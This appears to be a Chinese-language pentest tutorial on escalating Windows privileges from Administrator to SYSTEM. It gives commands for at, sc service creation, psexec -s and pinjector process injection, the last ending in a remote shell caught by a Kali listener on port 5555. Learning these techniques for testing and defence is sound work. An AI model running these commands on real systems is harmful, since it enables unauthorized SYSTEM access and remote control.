Windows本地提权

1
2
3
4
windows用户全权限划分:
	Users:普通用户组,Users 组是最安全的组,因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料
	Administrators:管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制 
	System:拥有和Administrators一样、甚至比其还高的权限,但是这个组不允许任何用户的加入,在查看用户组的时候,它也不会被显示出来,它就是SYSTEM组。系统和系统级的服务正常运行所需要的权限都是靠它赋予的。

1、at实现管理员权限提升为system权限

at 是一个发布定时任务计划的命令行工具,通过 at 命令发布的定时任务计划, Windows 默认以 SYSTEM 权限运行。定时任务计划可以是批处理、可以是一个二进制文件。 

1
at 15:33 /interactive cmd

image-20220321153232216

image-20220321153419585

2、新建桌面进程

使用taskmgr命令打开任务管理器,杀死现用户桌面进程(explorer.exe),新建explorer.exe,则整个界面都在管理员(因为当前的explorer进程实在system权限运行的)

image-20220321153501083

结束进程

image-20220321153638456

新建进程任务

image-20220321153702680

成功提权到system用户

image-20220321153754073

3、sc实现把administrator提升为system

SC 是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于”控制面板”中”管理工具”项中的”服务”

#在windows xp、windows 2003、windows 7、windows 8等上使用

1
sc Create syscmd binPath= "cmd /K start " type= own type= interact    创建服务

image-20220321154154157

1
sc start syscmd       启动创建的服务

image-20220321154405173

4、psexec

#可以在windows xp、windows 2003、windows 7等系统使用

1
2
psexec -i -s cmd    -i交互模式,-s使用system账号
windows系统有提供一个套件:https://docs.microsoft.com/zh-cn/sysinternals/downloads/

image-20220321164729433

5、注入进程提权

#只能在windows xp、windows 2003中用

1
2
·隐蔽痕迹
http://www.tarasco.org/security/Process_Injector/
1
2
pinjector.exe -l   查看进程
pinjector.exe -p PID cmd d

image-20220321212611770

kali监听5555端口,即可收到shell

image-20220321212838326